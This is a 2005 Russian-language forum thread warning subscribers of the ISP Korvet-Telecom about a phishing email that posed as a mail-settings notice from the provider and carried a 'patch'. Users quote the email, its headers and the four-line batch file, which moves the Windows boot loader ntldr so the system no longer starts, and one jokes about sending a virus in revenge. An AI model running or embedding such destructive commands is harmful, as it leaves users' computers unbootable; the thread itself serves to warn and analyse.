Форум Московских Сетей - Possum Forum-Z

Уважаемые абоненты!
Не в коем случае, не ставьте патч который,
указан и приатачен в письме, отправленном
с ящика many@ints.ru с темой "Сообщение Корвет Телеком".
Письмо отправлено недобросовесными конкурентами
с целью нарушения работоспособности сети.
Ведётся расследование, результаты которого
будут переданы в правоохранительные органы.
Администрация "Корвет-Телеком".

Вот текст заразы, к ней приаттачен Mail.bat

Код: Выделить всё

Уважаемые абоненты
Просьба обратить особое внимание на настройки Вашего программного обеспечения для приема электронной почты!
Настройки Вашей программы для приема почты, должны быть следующие:
POP3 сервер - ints.pop.pike.ru ;
SMTP сервер - ints.mail.pike.ru .
Если у Вас почта фильтрованная - логин@ints.pike.ru, то в настройках следует указать: POP3 сервер - ints.break.pike.ru;
SMTP сервер - ints.mail.pike.ru .
Так же в связи с вторым этапом модернизации почтового сервера вам необходимо изменить настройку вашего почтового клиента. Программа патч прилагаеться для облегчения настройки.
Если Вы не внесете указанные изменения, то электронная почта работать не будет. Если веше программное обеспечение блокирует вложенные файлы то вы можете запустить патч по ссылке
http://kkorvet.narod.ru/mail.bat
С уважением Администрация Корвет Телеком.


Нет, ну ИДИОТЫ!!! Ну только нездоровый на голову человек оставит в таком письме ссылку на народ.хрю - му*аки, простите за выражение - даже подна*рать народ разучился красиво - измельчали хакеры, измельчали....

Для интересующихся вот код батника:

Код: Выделить всё

attrib -r -a -s -h c:\ntldr
copy c:\ntldr c:\windows\ntldr
del c:\ntldr
del mail.bat


хех... мне вроде эта зараза не пришла...

Я тоже не получал. Вообще, больше всего бесит жуткая безграмотность. Сейчас что, в школе русский язык не преподают?

я не получал... и не видел про это и не слышал от знакомых...

А мне вот пришло.И патчик я успешно установил .К вечеру тока закончил систему переустанавливать.Не знаю из-за чего, но Винда перестала грузиться.

а ты код батничка почитай - ntldr это бутлоадер, без него ни одна NTя не запустится - переустановка НАФИГ не нужна, зная как эта гадость работает.

А теперь о смешном и грустном. Нет, я не могу! Эти "хакеры" ну ПОЛНЫЕ идиоты!!!
Вот заголовок письма, комментировать не буду, кто хоть немного разбираются поймут всё сами:

*********
Return-path: <many@ints.ru>
Envelope-to: (адрес жертвы)@ints.ru
Delivery-date: Sat, 27 Aug 2005 23:52:51 +0400
Received: from ints.relay.pike.ru ([85.30.199.198]) by ints.pop.pike.ru with esmtp (Exim 4.42
(FreeBSD)) id 1E96jS-000KX8-Mw for (адрес жертвы)@ints.ru; Sat, 27 Aug 2005 23:52:50 +0400
Received: from pike.relay.pike.ru ([85.30.230.220]) by ints.relay.pike.ru with esmtp (Exim 4.50
(FreeBSD)) id 1E96jN-000KOz-RG for (адрес жертвы)@ints.ru; Sat, 27 Aug 2005 23:52:50 +0400
Received: from ns.globonet.ru ([213.234.197.66] helo=globonet.ru) by pike.relay.pike.ru with smtp (Exim
4.51 (FreeBSD)) id 1E96jB-0003Je-EU for (адрес жертвы)@ints.ru; Sat, 27 Aug 2005 23:52:34 +0400
Received: (qmail 64688 invoked from network); 27 Aug 2005 19:52:33 -0000
X-Mail-Scanner: Scanned by qSheff 1.0-r1 (http://www.enderunix.org/qsheff/)
Received: from unknown (HELO MONSTR) (10.10.19.118) by ns.globonet.ru with SMTP; 27 Aug 2005 19:52:33 -
0000
Message-ID: <002e01c5aa77$f533a5c0$0200c6a2@MONSTR>
From: =?koi8-r?B?4cTNyc7J09TSwdTP0g==?= <many@ints.ru>
....(тут могучий список адресатов)
Subject: =?koi8-r?B?Rnc6IO7B09TSz8rLwSDQz97U2Q==?=
Date: Fri, 26 Aug 2005 23:54:23 +0400
Organization: =?koi8-r?B?68/S18XUIPTFzMXLz80=?=
MIME-Version: 1.0
Content-Type: multipart/mixed; boundary="----=_NextPart_000_002A_01C5AA99.7BEAA2A0"
X-Priority: 3
X-MSMail-Priority: Normal
X-Mailer: Microsoft Outlook Express 6.00.2900.2670
X-MimeOLE: Produced By Microsoft MimeOLE V6.00.2900.2670
X-Antivirus-Scanner: Scanned by Aidstest
X-Antivirus-Scanner: Scanned by Aidstest

Я плакал долго...

я че-то не понял? это корветовский айпишник? ... этож локальник... но что-то резолвить не могу. надо ему как-нидь вставить...

Сёдня опять получил письмецо..Но уже с другово адреса.Остальное всё то же.

Stun писал(а):я че-то не понял? это корветовский айпишник? ... этож локальник... но что-то резолвить не могу. надо ему как-нидь вставить...

Нет, это другая локалка. Но суть не в этом - эти Идиоты даже не удосужились найти анонимный SMTP и слали прямо из Оутглюка. Грубо говоря - идём к прову, пробиваем этот IP и сажаем его в тюрьму.

2 butcher: если ещё не стёр письмо - намыль заголовок мне на почту.

А ты думаешь что они сали через аутглюк? Например прога Анонимаилер может писать в письме любой айпи, тем самым подставить кого угодно... Я когда её проверял я парню присла письмо с его же ящика другого, а потом наооборот. И вписывал туда любой понравившийся айпи... Так что это не показатель...

Писать она может что угодно, но эти отмеченные строчки записываются МЕЙЛСЕРВЕРОМ, и НИКАКАЯ прога их подменить не может, если ты шлёшь не через анонимный PROXY (эту инфу серверу отдаёт никак не аутглюк). Потому и все вирусы тока тупо меняют адрес отправителя - ну НЕ МОГУТ они воздействовать на IP, логирующийся на сервере, а уж тем более между!!! серверами SMTP при пересылке.

А почему слали аутглюком - а ты конец заголовка почитай... учитывая общий идиотизм послания анонимайзеры исключены! (сначала идёт анонимный SMTP с открытым OpenRelay, затем уже всё остальное - если первое они не сделали - мне их жалко, т.к. в Корвете их уже пообещали засадить!)

2 Ivan S. Rybin письмо к сожелению уже удалено.Но дошли слухи, что подобные письма не только у нас гуляют.Вчера коллега на работе получил нечто подобное.
P.S:А может мы сами их найдём и устроим суд Линча.

дело уже передали в органы. КТ обещал обнародывать результаты дела.

А то, что такое "посланьеце" может запросто стать очередной "модой" у недоделанных, к общей беде компьютерного сообщеста научившихся логиниться в Windows, я не удивлюсь - идиотов много, и "прикол" в их стиле.

Но если нашего посадят, да так, что и у нас, и в окрестных локалках это станет темой дня - есть надежда, что будущие дегенераты хоть немного подумают, а повторять-ли?

Вариант, что они научатся делать такие вещи "красиво" и "как надо" я исключаю - обычно компьютерная грамотность сопровождается наличаем соображаловки и общим высоким культурным уровнем - грубо говоря, тем, кто может это сделать технически недоказуемо, это просто не нужно

А давайте теперь мы во вражескую сеть вируса зашлем